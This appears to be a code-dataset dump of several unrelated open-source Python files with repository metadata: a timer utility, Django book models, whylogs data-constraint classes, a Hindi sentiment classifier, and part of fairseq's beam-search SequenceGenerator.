text(c, w_offset, h_offset) def create_filename(word, num_list=[]): filename = word for number in num_list: filename = filename + '_{:04}'.format(int(number)) filename = filename + '.png' return filename
29.381679
90
0.573655
68e00a03e4f49ca331f71aea8400f20f79447ee6
175
py
Python
utils/stupid_timer.py
vladimirgamalyan/pictools
cfcda3f4a1272d8469f2dc604a8afc585929b0eb
[ "MIT" ]
null
null
null
utils/stupid_timer.py
vladimirgamalyan/pictools
cfcda3f4a1272d8469f2dc604a8afc585929b0eb
[ "MIT" ]
1
2017-04-08T20:40:21.000Z
2017-04-08T20:51:40.000Z
utils/stupid_timer.py
vladimirgamalian/pictools
cfcda3f4a1272d8469f2dc604a8afc585929b0eb
[ "MIT" ]
null
null
null
#!/usr/bin/python import time class StupidTimer: def __init__(self, t): self.t = time.clock() + t def finished(self): return time.clock() > self.t
14.583333
36
0.594286
09c319e4797542156f892f954e07dcae37673af5
468
py
Python
books_api/core/models.py
kennyaires/olist-challenge
ec0194c9b48d4ec8693d3d39498f63f42dfaf251
[ "MIT" ]
1
2022-01-16T23:29:39.000Z
2022-01-16T23:29:39.000Z
books_api/core/models.py
kennyaires/olist-challenge
ec0194c9b48d4ec8693d3d39498f63f42dfaf251
[ "MIT" ]
5
2021-03-19T12:18:04.000Z
2021-09-22T19:43:58.000Z
books_api/core/models.py
kennyaires/olist-challenge
ec0194c9b48d4ec8693d3d39498f63f42dfaf251
[ "MIT" ]
null
null
null
from django.db import models class Author(models.Model): name = models.CharField(max_length=255, unique=True) def __str__(self): return self.name class Book(models.Model): name = models.CharField(max_length=255) edition = models.CharField(max_length=255, null=True) publication_year = models.PositiveSmallIntegerField(blank=True, null=True) authors = models.ManyToManyField(Author) def __str__(self): return self.name
24.631579
78
0.720085
a467c22a3332ab7726d2d639c1f2cc140293cac0
13,377
py
Python
src/whylogs/core/statistics/constraints.py
whylabs/whylogs-python
937c43ea87946ec294e6d7ec9f3c35cfa0b7a22b
[ "Apache-2.0" ]
327
2020-08-18T17:09:44.000Z
2021-02-25T11:03:57.000Z
src/whylogs/core/statistics/constraints.py
whylabs/whylogs-core
80cce9d652553adc674d647e00ea8f414b75a95a
[ "Apache-2.0" ]
66
2020-08-25T15:18:16.000Z
2021-02-22T21:25:35.000Z
src/whylogs/core/statistics/constraints.py
whylabs/whylogs-python
937c43ea87946ec294e6d7ec9f3c35cfa0b7a22b
[ "Apache-2.0" ]
13
2020-09-08T22:44:10.000Z
2021-01-28T00:32:58.000Z
import logging import re from typing import List, Mapping, Optional from google.protobuf.json_format import Parse from whylogs.proto import ( DatasetConstraintMsg, DatasetProperties, NumberSummary, Op, SummaryConstraintMsg, SummaryConstraintMsgs, ValueConstraintMsg, ValueConstraintMsgs, ) from whylogs.util.protobuf import message_to_json logger = logging.getLogger(__name__) """ Dict indexed by constraint operator. These help translate from constraint schema to language-specific functions that are faster to evaluate. This is just a form of currying, and I chose to bind the boolean comparison operator first. """ _value_funcs = { # functions that compare an incoming feature value to a literal value. Op.LT: lambda x: lambda v: v < x, # assert incoming value 'v' is less than some fixed value 'x' Op.LE: lambda x: lambda v: v <= x, Op.EQ: lambda x: lambda v: v == x, Op.NE: lambda x: lambda v: v != x, Op.GE: lambda x: lambda v: v >= x, Op.GT: lambda x: lambda v: v > x, # assert incoming value 'v' is greater than some fixed value 'x' Op.MATCH: lambda x: lambda v: x.match(v) is not None, Op.NOMATCH: lambda x: lambda v: x.match(v) is None, } _summary_funcs1 = { # functions that compare a summary field to a literal value. Op.LT: lambda f, v: lambda s: getattr(s, f) < v, Op.LE: lambda f, v: lambda s: getattr(s, f) <= v, Op.EQ: lambda f, v: lambda s: getattr(s, f) == v, Op.NE: lambda f, v: lambda s: getattr(s, f) != v, Op.GE: lambda f, v: lambda s: getattr(s, f) >= v, Op.GT: lambda f, v: lambda s: getattr(s, f) > v, } _summary_funcs2 = { # functions that compare two summary fields. Op.LT: lambda f, f2: lambda s: getattr(s, f) < getattr(s, f2), Op.LE: lambda f, f2: lambda s: getattr(s, f) <= getattr(s, f2), Op.EQ: lambda f, f2: lambda s: getattr(s, f) == getattr(s, f2), Op.NE: lambda f, f2: lambda s: getattr(s, f) != getattr(s, f2), Op.GE: lambda f, f2: lambda s: getattr(s, f) >= getattr(s, f2), Op.GT: lambda f, f2: lambda s: getattr(s, f) > getattr(s, f2), } class ValueConstraint: """ ValueConstraints express a binary boolean relationship between an implied numeric value and a literal. When associated with a ColumnProfile, the relation is evaluated for every incoming value that is processed by whylogs. Parameters ---------- op : whylogs.proto.Op (required) Enumeration of binary comparison operator applied between static value and incoming stream. Enum values are mapped to operators like '==', '<', and '<=', etc. value : (required) Static value to compare against incoming stream using operator specified in `op`. name : str Name of the constraint used for reporting verbose : bool If true, log every application of this constraint that fails. Useful to identify specific streaming values that fail the constraint. """ def __init__(self, op: Op, value=None, regex_pattern: str = None, name: str = None, verbose=False): self._name = name self._verbose = verbose self.op = op self.total = 0 self.failures = 0 if value is not None and regex_pattern is None: # numeric value self.value = value self.func = _value_funcs[op](value) elif regex_pattern is not None and value is None: # Regex pattern self.regex_pattern = regex_pattern self.func = _value_funcs[op](re.compile(self.regex_pattern)) else: raise ValueError("Value constraint must specify a numeric value or regex pattern, but not both") @property def name(self): if getattr(self, "value", None): return self._name if self._name is not None else f"value {Op.Name(self.op)} {self.value}" else: return self._name if self._name is not None else f"value {Op.Name(self.op)} {self.regex_pattern}" def update(self, v) -> bool: self.total += 1 if self.op in [Op.MATCH, Op.NOMATCH] and not isinstance(v, str): self.failures += 1 if self._verbose: logger.info(f"value constraint {self.name} failed: value {v} not a string") elif not self.func(v): self.failures += 1 if self._verbose: logger.info(f"value constraint {self.name} failed on value {v}") @staticmethod def from_protobuf(msg: ValueConstraintMsg) -> "ValueConstraint": return ValueConstraint(msg.op, msg.value, name=msg.name, verbose=msg.verbose) def to_protobuf(self) -> ValueConstraintMsg: if hasattr(self, "value"): return ValueConstraintMsg( name=self.name, op=self.op, value=self.value, verbose=self._verbose, ) else: return ValueConstraintMsg( name=self.name, op=self.op, regex_pattern=self.regex_pattern, verbose=self._verbose, ) def report(self): return (self.name, self.total, self.failures) class SummaryConstraint: """ Summary constraints specify a relationship between a summary field and a static value, or between two summary fields. e.g. 'min' < 6 'std_dev' < 2.17 'min' > 'avg' Parameters ---------- first_field : str Name of field in NumberSummary that will be compared against either a second field or a static value. op : whylogs.proto.Op (required) Enumeration of binary comparison operator applied between summary values. Enum values are mapped to operators like '==', '<', and '<=', etc. value : (one-of) Static value to be compared against summary field specified in `first_field`. Only one of `value` or `second_field` should be supplied. second_field : (one-of) Name of second field in NumberSummary to be compared against summary field specified in `first_field`. Only one of `value` or `second_field` should be supplied. name : str Name of the constraint used for reporting verbose : bool If true, log every application of this constraint that fails. Useful to identify specific streaming values that fail the constraint. """ def __init__( self, first_field: str, op: Op, value=None, second_field: str = None, name: str = None, verbose=False, ): self._verbose = verbose self._name = name self.op = op self.first_field = first_field self.second_field = second_field self.total = 0 self.failures = 0 if value is not None and second_field is None: # field-value summary comparison self.value = value self.func = _summary_funcs1[op](first_field, value) elif second_field is not None and value is None: # field-field summary comparison self.second_field = second_field self.func = _summary_funcs2[op](first_field, second_field) else: raise ValueError("Summary constraint must specify a second value or field name, but not both") @property def name(self): return self._name if self._name is not None else f"summary {self.first_field} {Op.Name(self.op)} {self.value}/{self.second_field}" def update(self, summ: NumberSummary) -> bool: self.total += 1 if not self.func(summ): self.failures += 1 if self._verbose: logger.info(f"summary constraint {self.name} failed") @staticmethod def from_protobuf(msg: SummaryConstraintMsg) -> "SummaryConstraint": if msg.HasField("value") and not msg.HasField("second_field"): return SummaryConstraint( msg.first_field, msg.op, value=msg.value, name=msg.name, verbose=msg.verbose, ) elif msg.HasField("second_field") and not msg.HasField("value"): return SummaryConstraint( msg.first_field, msg.op, second_field=msg.second_field, name=msg.name, verbose=msg.verbose, ) else: raise ValueError("SummaryConstraintMsg must specify a value or second field name, but not both") def to_protobuf(self) -> SummaryConstraintMsg: if self.second_field is None: msg = SummaryConstraintMsg( name=self.name, first_field=self.first_field, op=self.op, value=self.value, verbose=self._verbose, ) else: msg = SummaryConstraintMsg( name=self.name, first_field=self.first_field, op=self.op, second_field=self.second_field, verbose=self._verbose, ) return msg def report(self): return (self.name, self.total, self.failures) class ValueConstraints: def __init__(self, constraints: List[ValueConstraint] = []): self.constraints = constraints @staticmethod def from_protobuf(msg: ValueConstraintMsgs) -> "ValueConstraints": v = [ValueConstraint.from_protobuf(c) for c in msg.constraints] if len(v) > 0: return ValueConstraints(v) return None def to_protobuf(self) -> ValueConstraintMsgs: v = [c.to_protobuf() for c in self.constraints] if len(v) > 0: vcmsg = ValueConstraintMsgs() vcmsg.constraints.extend(v) return vcmsg return None def update(self, v): for c in self.constraints: c.update(v) def report(self) -> List[tuple]: v = [c.report() for c in self.constraints] if len(v) > 0: return v return None class SummaryConstraints: def __init__(self, constraints: List[SummaryConstraint]): self.constraints = constraints @staticmethod def from_protobuf(msg: SummaryConstraintMsgs) -> "SummaryConstraints": v = [SummaryConstraint.from_protobuf(c) for c in msg.constraints] if len(v) > 0: return SummaryConstraints(v) return None def to_protobuf(self) -> SummaryConstraintMsgs: v = [c.to_protobuf() for c in self.constraints] if len(v) > 0: scmsg = SummaryConstraintMsgs() scmsg.constraints.extend(v) return scmsg return None def update(self, v): for c in self.constraints: c.update(v) def report(self) -> List[tuple]: v = [c.report() for c in self.constraints] if len(v) > 0: return v return None class DatasetConstraints: def __init__( self, props: DatasetProperties, value_constraints: Optional[Mapping[str, ValueConstraints]] = None, summary_constraints: Optional[Mapping[str, SummaryConstraints]] = None, ): self.dataset_properties = props # repackage lists of constraints if necessary if value_constraints is None: value_constraints = dict() for k, v in value_constraints.items(): if isinstance(v, list): value_constraints[k] = ValueConstraints(v) self.value_constraint_map = value_constraints if summary_constraints is None: summary_constraints = dict() for k, v in summary_constraints.items(): if isinstance(v, list): summary_constraints[k] = SummaryConstraints(v) self.summary_constraint_map = summary_constraints def __getitem__(self, key): if key in self.value_constraint_map: return self.value_constraint_map[key] return None @staticmethod def from_protobuf(msg: DatasetConstraintMsg) -> "DatasetConstraints": vm = dict([(k, ValueConstraints.from_protobuf(v)) for k, v in msg.value_constraints.items()]) sm = dict([(k, SummaryConstraints.from_protobuf(v)) for k, v in msg.summary_constraints.items()]) return DatasetConstraints(msg.properties, vm, sm) @staticmethod def from_json(data: str) -> "DatasetConstraints": msg = Parse(data, DatasetConstraintMsg()) return DatasetConstraints.from_protobuf(msg) def to_protobuf(self) -> DatasetConstraintMsg: # construct tuple for each column, (name, [constraints,...]) # turn that into a map indexed by column name vm = dict([(k, v.to_protobuf()) for k, v in self.value_constraint_map.items()]) sm = dict([(k, s.to_protobuf()) for k, s in self.summary_constraint_map.items()]) return DatasetConstraintMsg( properties=self.dataset_properties, value_constraints=vm, summary_constraints=sm, ) def to_json(self) -> str: return message_to_json(self.to_protobuf()) def report(self): l1 = [(k, v.report()) for k, v in self.value_constraint_map.items()] l2 = [(k, s.report()) for k, s in self.summary_constraint_map.items()] return l1 + l2
36.252033
138
0.614488
d7587a7b5a88339a0cd5d11099e6abfd34795602
2,499
py
Python
ResourceBasedSentimentClassification.py
nishii-singh/Sentiment-analysis
efd75687ccf79e8aac44328c0cb999a9c14000c4
[ "Apache-2.0" ]
null
null
null
ResourceBasedSentimentClassification.py
nishii-singh/Sentiment-analysis
efd75687ccf79e8aac44328c0cb999a9c14000c4
[ "Apache-2.0" ]
null
null
null
ResourceBasedSentimentClassification.py
nishii-singh/Sentiment-analysis
efd75687ccf79e8aac44328c0cb999a9c14000c4
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python # coding: utf-8 # In[ ]: # NISHI SINGH # HOOMACL201900025 # MA COMPUTATIONAL LINGUISTICS # This module is written to do a Resource Based Semantic analyasis using hindi sentiwordnet. import pandas as pd import codecs from nltk.tokenize import word_tokenize import sklearn.metrics import re fields = ['POS_TAG', 'ID', 'POS', 'NEG', 'LIST_OF_WORDS'] #Creating a dictionary which contain a tuple for every word. Tuple contains a list of synonyms, # positive score and negative score for that word. def sentiment(text): print(text) words = word_tokenize(text) votes = [] pos_polarity = 0 neg_polarity = 0 #adverbs, nouns, adjective, verb are only used allowed_words = ['a','v','r','n'] for word in words: if word in words_dict: #if word in dictionary, it picks up the positive and negative score of the word pos, neg = words_dict[word] print(word,pos, neg) if pos > neg: pos_polarity += pos votes.append(1) elif neg > pos: neg_polarity += neg votes.append(0) #calculating the no. of positive and negative words in total in a review to give class labels pos_votes = votes.count(1) neg_votes = votes.count(0) if pos_votes > neg_votes: return 1 elif neg_votes > pos_votes: return -1 else: if pos_polarity < neg_polarity: return 1 elif neg_polarity>pos_polarity : return -1 else: return 0 words_dict = {} # This function determines sentiment of text. data = pd.read_csv("HindiSentiWordnet.txt", delimiter=' ') for i in data.index: # print (data[fields[0]][i], data[fields[1]][i], data[fields[2]][i], data[fields[3]][i], data[fields[4]][i]) words = data[fields[4]][i].split(',') for word in words: words_dict[word] = (data[fields[2]][i], data[fields[3]][i]) #print(word,data[fields[0]][i], data[fields[2]][i], data[fields[3]][i]) # for x in words_dict: # print(x) # for y in words_dict[x]: # print(y) c='Y' while c=='Y' or c=='y': text=input('Enter a Hindi news article: ') t=sentiment(text) if t==1: print("Positive") elif t==-1 : print("Negative") else: print("Neutral") c=input('To Continue press Y: ') #print(len(actual_y)) #print(accuracy_score(actual_y, pred_y) * 100) #print('F-measure: ',f1_score(actual_y,pred_y))
30.108434
112
0.615046
7d323d85e7c9ca9325c77f12c3a95d259459ede7
39,780
py
Python
fairseq/sequence_generator.py
dumpmemory/fairseq
c39fefccb013bfb8b1dc6cbbfabe1fd7ad4344a7
[ "MIT" ]
1
2021-11-10T06:17:44.000Z
2021-11-10T06:17:44.000Z
fairseq/sequence_generator.py
EricWangCN/fairseq
321589988bc05038f927cf5e887e8c60f46d9c2a
[ "MIT" ]
null
null
null
fairseq/sequence_generator.py
EricWangCN/fairseq
321589988bc05038f927cf5e887e8c60f46d9c2a
[ "MIT" ]
null
null
null
# Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. import math import sys from typing import Dict, List, Optional import torch import torch.nn as nn from torch import Tensor from fairseq import search, utils from fairseq.data import data_utils from fairseq.models import FairseqIncrementalDecoder from fairseq.ngram_repeat_block import NGramRepeatBlock class SequenceGenerator(nn.Module): def __init__( self, models, tgt_dict, beam_size=1, max_len_a=0, max_len_b=200, max_len=0, min_len=1, normalize_scores=True, len_penalty=1.0, unk_penalty=0.0, temperature=1.0, match_source_len=False, no_repeat_ngram_size=0, search_strategy=None, eos=None, symbols_to_strip_from_output=None, lm_model=None, lm_weight=1.0, ): """Generates translations of a given source sentence. Args: models (List[~fairseq.models.FairseqModel]): ensemble of models, currently support fairseq.models.TransformerModel for scripting beam_size (int, optional): beam width (default: 1) max_len_a/b (int, optional): generate sequences of maximum length ax + b, where x is the source length max_len (int, optional): the maximum length of the generated output (not including end-of-sentence) min_len (int, optional): the minimum length of the generated output (not including end-of-sentence) normalize_scores (bool, optional): normalize scores by the length of the output (default: True) len_penalty (float, optional): length penalty, where <1.0 favors shorter, >1.0 favors longer sentences (default: 1.0) unk_penalty (float, optional): unknown word penalty, where <0 produces more unks, >0 produces fewer (default: 0.0) temperature (float, optional): temperature, where values >1.0 produce more uniform samples and values <1.0 produce sharper samples (default: 1.0) match_source_len (bool, optional): outputs should match the source length (default: False) """ super().__init__() if isinstance(models, EnsembleModel): self.model = models else: self.model = EnsembleModel(models) self.tgt_dict = tgt_dict self.pad = tgt_dict.pad() self.unk = tgt_dict.unk() self.eos = tgt_dict.eos() if eos is None else eos self.symbols_to_strip_from_output = ( symbols_to_strip_from_output.union({self.eos}) if symbols_to_strip_from_output is not None else {self.eos} ) self.vocab_size = len(tgt_dict) self.beam_size = beam_size # the max beam size is the dictionary size - 1, since we never select pad self.beam_size = min(beam_size, self.vocab_size - 1) self.model.set_decoder_beam_size(self.beam_size) self.max_len_a = max_len_a self.max_len_b = max_len_b self.min_len = min_len self.max_len = max_len or self.model.max_decoder_positions() self.normalize_scores = normalize_scores self.len_penalty = len_penalty self.unk_penalty = unk_penalty self.temperature = temperature self.match_source_len = match_source_len if no_repeat_ngram_size > 0: self.repeat_ngram_blocker = NGramRepeatBlock(no_repeat_ngram_size) else: self.repeat_ngram_blocker = None assert temperature > 0, "--temperature must be greater than 0" self.search = ( search.BeamSearch(tgt_dict) if search_strategy is None else search_strategy ) # We only need to set src_lengths in LengthConstrainedBeamSearch. # As a module attribute, setting it would break in multithread # settings when the model is shared. self.should_set_src_lengths = ( hasattr(self.search, "needs_src_lengths") and self.search.needs_src_lengths ) self.model.eval() self.lm_model = lm_model self.lm_weight = lm_weight if self.lm_model is not None: self.lm_model.eval() def cuda(self): self.model.cuda() return self @torch.no_grad() def forward( self, sample: Dict[str, Dict[str, Tensor]], prefix_tokens: Optional[Tensor] = None, bos_token: Optional[int] = None, ): """Generate a batch of translations. Args: sample (dict): batch prefix_tokens (torch.LongTensor, optional): force decoder to begin with these tokens bos_token (int, optional): beginning of sentence token (default: self.eos) """ return self._generate(sample, prefix_tokens, bos_token=bos_token) # TODO(myleott): unused, deprecate after pytorch-translate migration def generate_batched_itr(self, data_itr, beam_size=None, cuda=False, timer=None): """Iterate over a batched dataset and yield individual translations. Args: cuda (bool, optional): use GPU for generation timer (StopwatchMeter, optional): time generations """ for sample in data_itr: s = utils.move_to_cuda(sample) if cuda else sample if "net_input" not in s: continue input = s["net_input"] # model.forward normally channels prev_output_tokens into the decoder # separately, but SequenceGenerator directly calls model.encoder encoder_input = { k: v for k, v in input.items() if k != "prev_output_tokens" } if timer is not None: timer.start() with torch.no_grad(): hypos = self.generate(encoder_input) if timer is not None: timer.stop(sum(len(h[0]["tokens"]) for h in hypos)) for i, id in enumerate(s["id"].data): # remove padding src = utils.strip_pad(input["src_tokens"].data[i, :], self.pad) ref = ( utils.strip_pad(s["target"].data[i, :], self.pad) if s["target"] is not None else None ) yield id, src, ref, hypos[i] @torch.no_grad() def generate( self, models, sample: Dict[str, Dict[str, Tensor]], **kwargs ) -> List[List[Dict[str, Tensor]]]: """Generate translations. Match the api of other fairseq generators. Args: models (List[~fairseq.models.FairseqModel]): ensemble of models sample (dict): batch prefix_tokens (torch.LongTensor, optional): force decoder to begin with these tokens constraints (torch.LongTensor, optional): force decoder to include the list of constraints bos_token (int, optional): beginning of sentence token (default: self.eos) """ return self._generate(sample, **kwargs) def _generate( self, sample: Dict[str, Dict[str, Tensor]], prefix_tokens: Optional[Tensor] = None, constraints: Optional[Tensor] = None, bos_token: Optional[int] = None, ): incremental_states = torch.jit.annotate( List[Dict[str, Dict[str, Optional[Tensor]]]], [ torch.jit.annotate(Dict[str, Dict[str, Optional[Tensor]]], {}) for i in range(self.model.models_size) ], ) net_input = sample["net_input"] if "src_tokens" in net_input: src_tokens = net_input["src_tokens"] # length of the source text being the character length except EndOfSentence and pad src_lengths = ( (src_tokens.ne(self.eos) & src_tokens.ne(self.pad)).long().sum(dim=1) ) elif "source" in net_input: src_tokens = net_input["source"] src_lengths = ( net_input["padding_mask"].size(-1) - net_input["padding_mask"].sum(-1) if net_input["padding_mask"] is not None else torch.tensor(src_tokens.size(-1)).to(src_tokens) ) elif "features" in net_input: src_tokens = net_input["features"] src_lengths = ( net_input["padding_mask"].size(-1) - net_input["padding_mask"].sum(-1) if net_input["padding_mask"] is not None else torch.tensor(src_tokens.size(-1)).to(src_tokens) ) else: raise Exception( "expected src_tokens or source in net input. input keys: " + str(net_input.keys()) ) # bsz: total number of sentences in beam # Note that src_tokens may have more than 2 dimensions (i.e. audio features) bsz, src_len = src_tokens.size()[:2] beam_size = self.beam_size if constraints is not None and not self.search.supports_constraints: raise NotImplementedError( "Target-side constraints were provided, but search method doesn't support them" ) # Initialize constraints, when active self.search.init_constraints(constraints, beam_size) max_len: int = -1 if self.match_source_len: max_len = src_lengths.max().item() else: max_len = min( int(self.max_len_a * src_len + self.max_len_b), self.max_len - 1, ) assert ( self.min_len <= max_len ), "min_len cannot be larger than max_len, please adjust these!" # compute the encoder output for each beam with torch.autograd.profiler.record_function("EnsembleModel: forward_encoder"): encoder_outs = self.model.forward_encoder(net_input) # placeholder of indices for bsz * beam_size to hold tokens and accumulative scores new_order = torch.arange(bsz).view(-1, 1).repeat(1, beam_size).view(-1) new_order = new_order.to(src_tokens.device).long() encoder_outs = self.model.reorder_encoder_out(encoder_outs, new_order) # ensure encoder_outs is a List. assert encoder_outs is not None # initialize buffers scores = ( torch.zeros(bsz * beam_size, max_len + 1).to(src_tokens).float() ) # +1 for eos; pad is never chosen for scoring tokens = ( torch.zeros(bsz * beam_size, max_len + 2) .to(src_tokens) .long() .fill_(self.pad) ) # +2 for eos and pad tokens[:, 0] = self.eos if bos_token is None else bos_token attn: Optional[Tensor] = None # A list that indicates candidates that should be ignored. # For example, suppose we're sampling and have already finalized 2/5 # samples. Then cands_to_ignore would mark 2 positions as being ignored, # so that we only finalize the remaining 3 samples. cands_to_ignore = ( torch.zeros(bsz, beam_size).to(src_tokens).eq(-1) ) # forward and backward-compatible False mask # list of completed sentences finalized = torch.jit.annotate( List[List[Dict[str, Tensor]]], [torch.jit.annotate(List[Dict[str, Tensor]], []) for i in range(bsz)], ) # contains lists of dictionaries of infomation about the hypothesis being finalized at each step # a boolean array indicating if the sentence at the index is finished or not finished = [False for i in range(bsz)] num_remaining_sent = bsz # number of sentences remaining # number of candidate hypos per step cand_size = 2 * beam_size # 2 x beam size in case half are EOS # offset arrays for converting between different indexing schemes bbsz_offsets = ( (torch.arange(0, bsz) * beam_size) .unsqueeze(1) .type_as(tokens) .to(src_tokens.device) ) cand_offsets = torch.arange(0, cand_size).type_as(tokens).to(src_tokens.device) reorder_state: Optional[Tensor] = None batch_idxs: Optional[Tensor] = None original_batch_idxs: Optional[Tensor] = None if "id" in sample and isinstance(sample["id"], Tensor): original_batch_idxs = sample["id"] else: original_batch_idxs = torch.arange(0, bsz).type_as(tokens) for step in range(max_len + 1): # one extra step for EOS marker # reorder decoder internal states based on the prev choice of beams if reorder_state is not None: if batch_idxs is not None: # update beam indices to take into account removed sentences corr = batch_idxs - torch.arange(batch_idxs.numel()).type_as( batch_idxs ) reorder_state.view(-1, beam_size).add_( corr.unsqueeze(-1) * beam_size ) original_batch_idxs = original_batch_idxs[batch_idxs] self.model.reorder_incremental_state(incremental_states, reorder_state) encoder_outs = self.model.reorder_encoder_out( encoder_outs, reorder_state ) with torch.autograd.profiler.record_function( "EnsembleModel: forward_decoder" ): lprobs, avg_attn_scores = self.model.forward_decoder( tokens[:, : step + 1], encoder_outs, incremental_states, self.temperature, ) if self.lm_model is not None: lm_out = self.lm_model(tokens[:, : step + 1]) probs = self.lm_model.get_normalized_probs( lm_out, log_probs=True, sample=None ) probs = probs[:, -1, :] * self.lm_weight lprobs += probs lprobs[lprobs != lprobs] = torch.tensor(-math.inf).to(lprobs) lprobs[:, self.pad] = -math.inf # never select pad lprobs[:, self.unk] -= self.unk_penalty # apply unk penalty # handle max length constraint if step >= max_len: lprobs[:, : self.eos] = -math.inf lprobs[:, self.eos + 1 :] = -math.inf # handle prefix tokens (possibly with different lengths) if ( prefix_tokens is not None and step < prefix_tokens.size(1) and step < max_len ): lprobs, tokens, scores = self._prefix_tokens( step, lprobs, scores, tokens, prefix_tokens, beam_size ) elif step < self.min_len: # minimum length constraint (does not apply if using prefix_tokens) lprobs[:, self.eos] = -math.inf # Record attention scores, only support avg_attn_scores is a Tensor if avg_attn_scores is not None: if attn is None: attn = torch.empty( bsz * beam_size, avg_attn_scores.size(1), max_len + 2 ).to(scores) attn[:, :, step + 1].copy_(avg_attn_scores) scores = scores.type_as(lprobs) eos_bbsz_idx = torch.empty(0).to( tokens ) # indices of hypothesis ending with eos (finished sentences) eos_scores = torch.empty(0).to( scores ) # scores of hypothesis ending with eos (finished sentences) if self.should_set_src_lengths: self.search.set_src_lengths(src_lengths) if self.repeat_ngram_blocker is not None: lprobs = self.repeat_ngram_blocker(tokens, lprobs, bsz, beam_size, step) # Shape: (batch, cand_size) cand_scores, cand_indices, cand_beams = self.search.step( step, lprobs.view(bsz, -1, self.vocab_size), scores.view(bsz, beam_size, -1)[:, :, :step], tokens[:, : step + 1], original_batch_idxs, ) # cand_bbsz_idx contains beam indices for the top candidate # hypotheses, with a range of values: [0, bsz*beam_size), # and dimensions: [bsz, cand_size] cand_bbsz_idx = cand_beams.add(bbsz_offsets) # finalize hypotheses that end in eos # Shape of eos_mask: (batch size, beam size) eos_mask = cand_indices.eq(self.eos) & cand_scores.ne(-math.inf) eos_mask[:, :beam_size][cands_to_ignore] = torch.tensor(0).to(eos_mask) # only consider eos when it's among the top beam_size indices # Now we know what beam item(s) to finish # Shape: 1d list of absolute-numbered eos_bbsz_idx = torch.masked_select( cand_bbsz_idx[:, :beam_size], mask=eos_mask[:, :beam_size] ) finalized_sents: List[int] = [] if eos_bbsz_idx.numel() > 0: eos_scores = torch.masked_select( cand_scores[:, :beam_size], mask=eos_mask[:, :beam_size] ) finalized_sents = self.finalize_hypos( step, eos_bbsz_idx, eos_scores, tokens, scores, finalized, finished, beam_size, attn, src_lengths, max_len, ) num_remaining_sent -= len(finalized_sents) assert num_remaining_sent >= 0 if num_remaining_sent == 0: break if self.search.stop_on_max_len and step >= max_len: break assert step < max_len, f"{step} < {max_len}" # Remove finalized sentences (ones for which {beam_size} # finished hypotheses have been generated) from the batch. if len(finalized_sents) > 0: new_bsz = bsz - len(finalized_sents) # construct batch_idxs which holds indices of batches to keep for the next pass batch_mask = torch.ones( bsz, dtype=torch.bool, device=cand_indices.device ) batch_mask[finalized_sents] = False # TODO replace `nonzero(as_tuple=False)` after TorchScript supports it batch_idxs = torch.arange( bsz, device=cand_indices.device ).masked_select(batch_mask) # Choose the subset of the hypothesized constraints that will continue self.search.prune_sentences(batch_idxs) eos_mask = eos_mask[batch_idxs] cand_beams = cand_beams[batch_idxs] bbsz_offsets.resize_(new_bsz, 1) cand_bbsz_idx = cand_beams.add(bbsz_offsets) cand_scores = cand_scores[batch_idxs] cand_indices = cand_indices[batch_idxs] if prefix_tokens is not None: prefix_tokens = prefix_tokens[batch_idxs] src_lengths = src_lengths[batch_idxs] cands_to_ignore = cands_to_ignore[batch_idxs] scores = scores.view(bsz, -1)[batch_idxs].view(new_bsz * beam_size, -1) tokens = tokens.view(bsz, -1)[batch_idxs].view(new_bsz * beam_size, -1) if attn is not None: attn = attn.view(bsz, -1)[batch_idxs].view( new_bsz * beam_size, attn.size(1), -1 ) bsz = new_bsz else: batch_idxs = None # Set active_mask so that values > cand_size indicate eos hypos # and values < cand_size indicate candidate active hypos. # After, the min values per row are the top candidate active hypos # Rewrite the operator since the element wise or is not supported in torchscript. eos_mask[:, :beam_size] = ~((~cands_to_ignore) & (~eos_mask[:, :beam_size])) active_mask = torch.add( eos_mask.type_as(cand_offsets) * cand_size, cand_offsets[: eos_mask.size(1)], ) # get the top beam_size active hypotheses, which are just # the hypos with the smallest values in active_mask. # {active_hypos} indicates which {beam_size} hypotheses # from the list of {2 * beam_size} candidates were # selected. Shapes: (batch size, beam size) new_cands_to_ignore, active_hypos = torch.topk( active_mask, k=beam_size, dim=1, largest=False ) # update cands_to_ignore to ignore any finalized hypos. cands_to_ignore = new_cands_to_ignore.ge(cand_size)[:, :beam_size] # Make sure there is at least one active item for each sentence in the batch. assert (~cands_to_ignore).any(dim=1).all() # update cands_to_ignore to ignore any finalized hypos # {active_bbsz_idx} denotes which beam number is continued for each new hypothesis (a beam # can be selected more than once). active_bbsz_idx = torch.gather(cand_bbsz_idx, dim=1, index=active_hypos) active_scores = torch.gather(cand_scores, dim=1, index=active_hypos) active_bbsz_idx = active_bbsz_idx.view(-1) active_scores = active_scores.view(-1) # copy tokens and scores for active hypotheses # Set the tokens for each beam (can select the same row more than once) tokens[:, : step + 1] = torch.index_select( tokens[:, : step + 1], dim=0, index=active_bbsz_idx ) # Select the next token for each of them tokens.view(bsz, beam_size, -1)[:, :, step + 1] = torch.gather( cand_indices, dim=1, index=active_hypos ) if step > 0: scores[:, :step] = torch.index_select( scores[:, :step], dim=0, index=active_bbsz_idx ) scores.view(bsz, beam_size, -1)[:, :, step] = torch.gather( cand_scores, dim=1, index=active_hypos ) # Update constraints based on which candidates were selected for the next beam self.search.update_constraints(active_hypos) # copy attention for active hypotheses if attn is not None: attn[:, :, : step + 2] = torch.index_select( attn[:, :, : step + 2], dim=0, index=active_bbsz_idx ) # reorder incremental state in decoder reorder_state = active_bbsz_idx # sort by score descending for sent in range(len(finalized)): scores = torch.tensor( [float(elem["score"].item()) for elem in finalized[sent]] ) _, sorted_scores_indices = torch.sort(scores, descending=True) finalized[sent] = [finalized[sent][ssi] for ssi in sorted_scores_indices] finalized[sent] = torch.jit.annotate( List[Dict[str, Tensor]], finalized[sent] ) return finalized def _prefix_tokens( self, step: int, lprobs, scores, tokens, prefix_tokens, beam_size: int ): """Handle prefix tokens""" prefix_toks = prefix_tokens[:, step].unsqueeze(-1).repeat(1, beam_size).view(-1) prefix_lprobs = lprobs.gather(-1, prefix_toks.unsqueeze(-1)) prefix_mask = prefix_toks.ne(self.pad) lprobs[prefix_mask] = torch.tensor(-math.inf).to(lprobs) lprobs[prefix_mask] = lprobs[prefix_mask].scatter( -1, prefix_toks[prefix_mask].unsqueeze(-1), prefix_lprobs[prefix_mask] ) # if prefix includes eos, then we should make sure tokens and # scores are the same across all beams eos_mask = prefix_toks.eq(self.eos) if eos_mask.any(): # validate that the first beam matches the prefix first_beam = tokens[eos_mask].view(-1, beam_size, 